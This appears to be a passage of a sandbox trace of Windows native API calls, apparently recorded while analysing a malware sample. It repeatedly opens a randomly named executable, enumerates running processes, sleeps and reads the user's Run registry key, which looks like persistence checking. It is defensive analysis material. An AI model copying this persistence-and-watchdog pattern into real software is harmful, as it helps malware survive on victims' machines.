NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.625] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.626] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.626] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.626] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.626] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.630] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.644] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.644] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.644] NtClose (Handle=0x14c) returned 0x0 [0176.644] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.644] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.645] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.645] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.645] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.645] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.648] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.659] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.659] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.660] NtClose (Handle=0x14c) returned 0x0 [0176.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.660] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.660] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.660] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.660] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.663] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.675] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.675] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.675] NtClose (Handle=0x14c) returned 0x0 [0176.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.675] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.675] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.675] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.675] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.678] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.688] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.688] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.688] NtClose (Handle=0x14c) returned 0x0 [0176.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.688] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.688] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.688] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.689] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.692] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.706] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.706] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.706] NtClose (Handle=0x14c) returned 0x0 [0176.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.706] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.706] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.706] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.706] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.710] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.717] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.718] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.718] NtClose (Handle=0x14c) returned 0x0 [0176.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.718] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.718] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.718] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.718] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 